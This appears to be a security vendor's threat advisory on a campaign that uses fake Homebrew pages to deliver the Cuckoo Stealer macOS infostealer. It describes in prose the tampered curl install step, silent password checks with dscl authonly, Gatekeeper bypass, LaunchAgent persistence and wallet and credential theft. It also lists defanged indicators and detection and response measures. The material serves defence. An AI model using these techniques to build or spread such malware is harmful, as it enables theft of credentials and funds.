Critical Threat Research : The Iranian Cyber War Intensifies!
Comprehensive Threat Exposure Management Platform
A sophisticated social engineering campaign leverages the ClickFix technique to deliver Cuckoo Stealer, a full-featured macOS infostealer and remote access trojan, through typosquatted Homebrew installation pages targeting macOS developers worldwide. Attackers created high-fidelity clones of the legitimate Homebrew website (brew.sh) across multiple typosquatted domains hosted on shared infrastructure, deceiving macOS developers into executing modified curl commands that download credential-harvesting loaders followed by second-stage Cuckoo Stealer infostealer binaries. This Homebrew ClickFix campaign targets software development, technology, and cryptocurrency industries globally while excluding CIS countries, exploiting developer trust in the widely-used Homebrew package manager. The Cuckoo Stealer malware deployed through fake Homebrew sites is capable of exfiltrating browser credentials, cryptocurrency wallets, macOS Keychain data, messaging application sessions including Discord and Telegram, and financial data from over twenty cryptocurrency applications. The fake Homebrew campaign first observed on January 13, 2026, funnels macOS victims to typosquatted Homebrew domains through search engine poisoning, malicious advertisements, and deceptive look-alike URLs that deliver Cuckoo Stealer malware disguised as legitimate Homebrew installation scripts.
A social engineering campaign targets macOS users by impersonating the official Homebrew package manager website and weaponizing developer trust in this essential macOS tool. Victims are funneled to typosquatted Homebrew domains through search engine poisoning, malicious advertisements, and deceptive look-alike URLs mimicking the legitimate brew.sh domain. Threat actors built near pixel-perfect clones of the legitimate Homebrew site, carefully replicating its branding, layout, and multilingual functionality to deceive macOS developers. The fake Homebrew deception hinges on subtle modification within the installation command displayed on typosquatted sites: instead of pulling from the legitimate raw.githubusercontent.com domain, the malicious Homebrew script references raw.homabrews[.]org, a minor alteration easily evading casual inspection by macOS developers. A JavaScript-powered “Copy” button on fake Homebrew sites silently places the malicious curl command into the user’s clipboard, exploiting the common developer workflow of pasting Homebrew installation commands directly into Terminal.
Once the fake Homebrew command is executed, the tampered curl retrieves a trojanized installer script from attacker-controlled infrastructure. Malicious logic is injected into what appears to be the standard Homebrew installation routine targeting macOS systems. The first-stage Cuckoo Stealer payload focuses on credential harvesting, repeatedly prompting macOS users for their system passwords. The fake Homebrew script leverages the native macOS dscl utility with the authonly argument to validate credentials without creating login sessions or generating authentication logs, making Cuckoo Stealer credential theft difficult to detect. Failed credential attempts return convincing “Sorry, try again” messages mimicking normal sudo behavior on macOS. After obtaining valid macOS credentials, the fake Homebrew script downloads a secondary binary named brew_agent into /tmp, Base64-encodes the stolen password, and passes it as a parameter. This stage deploys full Cuckoo Stealer malware, which initializes command-and-control communications, generates unique session identifiers, collects macOS environment data, and removes the macOS quarantine attribute via xattr to suppress Gatekeeper warnings. Cuckoo Stealer also performs locale-based filtering to avoid macOS systems configured for CIS regions and uses custom XOR-based string obfuscation with rotating keys to evade static detection.
To maintain persistence on compromised macOS systems, Cuckoo Stealer abuses the macOS LaunchAgent mechanism, registering itself as com.homebrew.brewupdater.plist to blend in as a legitimate Homebrew component. The Cuckoo Stealer binary is copied into hidden macOS directories such as .local-{session_id} under the name BrewUpdater. Cuckoo Stealer command-and-control traffic is encrypted over HTTPS using X25519 elliptic curve Diffie-Hellman key exchange, generating ephemeral key pairs to derive shared secrets for session encryption. The Cuckoo Stealer malware implements a compact RAT protocol supporting arbitrary shell execution on macOS, silent command execution, system reboot, self-destruct routines with LaunchAgent cleanup, and granular exfiltration controls. Cuckoo Stealer commands are transmitted as single-byte identifiers within pipe-delimited beacon structures and encrypted using XOR keys derived from MD5 hashes for macOS C2 communications.
Cuckoo Stealer’s data exfiltration capabilities are extensive and financially motivated, targeting macOS users in software development and cryptocurrency industries. The malware silently captures screenshots using the macOS screencapture -x utility and establishes secondary socket channels for interactive file browsing on compromised macOS systems. Before sensitive activity, Cuckoo Stealer mutes system audio via AppleScript to reduce user awareness during exfiltration. Browser credential theft targets Chromium-based browsers on macOS, extracting cookies, saved logins, autofill records, browsing history, bookmarks, and installed extensions, particularly cryptocurrency wallet extensions including Coinbase Wallet, Phantom, Binance Wallet, and Rabby. Cuckoo Stealer also exfiltrates the macOS Keychain directory, Apple Notes databases, Discord tokens, Telegram session data, FileZilla credentials, OpenVPN profiles, Steam session files, and wallet data from over twenty cryptocurrency applications including node wallets for Bitcoin, Litecoin, Dogecoin, Raven, and DashCore, demonstrating deliberate focus on harvesting high-value financial assets from macOS developers at scale.
macOS users must always verify the legitimacy of Homebrew installation commands by confirming the source URL before executing any curl-based installation command in Terminal. Bookmark the legitimate brew.sh website to avoid reliance on search engine results that may be poisoned with fake Homebrew typosquatted domains. Only execute Homebrew installation commands from the verified official brew.sh domain.
Organizations must immediately block identified malicious Homebrew typosquatted domains (homabrews[.]org, brewsh[.]cx, brrewsh[.]org, brewshh[.]org, brewmacos[.]com) and IP address 5.255.123[.]244 at DNS, proxy, and firewall levels across all organizational macOS endpoints to prevent Cuckoo Stealer infections from fake Homebrew campaigns.
Security teams must review all LaunchAgent plists in ~/Library/LaunchAgents/ on macOS systems for suspicious entries, specifically checking for com.homebrew.brewupdater.plist or any plist referencing binaries in hidden directories matching the pattern “.local-” within user home directories, indicating potential Cuckoo Stealer persistence from fake Homebrew compromise.
Organizations should create detection rules for macOS processes invoking the dscl command with the authonly verb outside expected authentication workflows, as this indicates potential credential harvesting activity consistent with Cuckoo Stealer’s first-stage payload deployed through fake Homebrew campaigns.
Implement browser extension whitelisting policies to protect cryptocurrency wallet extensions (Coinbase Wallet, Phantom Wallet, Binance Wallet, Rabby Wallet) on macOS from unauthorized Local Storage and IndexedDB access by malicious processes like Cuckoo Stealer deployed through fake Homebrew social engineering.
If evidence of Cuckoo Stealer compromise from fake Homebrew campaigns is found, immediately rotate all credentials stored in macOS Keychain, browser password managers, FTP clients (FileZilla), VPN configurations (OpenVPN), and messaging application sessions (Discord, Telegram), as Cuckoo Stealer targets all of these credential stores on compromised macOS systems.
Deploy DNS monitoring solutions capable of detecting typosquatting patterns targeting commonly used developer tools and package managers like Homebrew, with automated alerting for domains closely resembling legitimate software distribution infrastructure used by macOS developers.
homabrews[.]org, raw[.]brewsh[.]cx, braw[.]sh, brewsh[.]cx, brew[.]lat, brew[.]pages[.]dev, brrewsh[.]org, brewmacos[.]com
Get through updates and upcoming events, and more directly in your inbox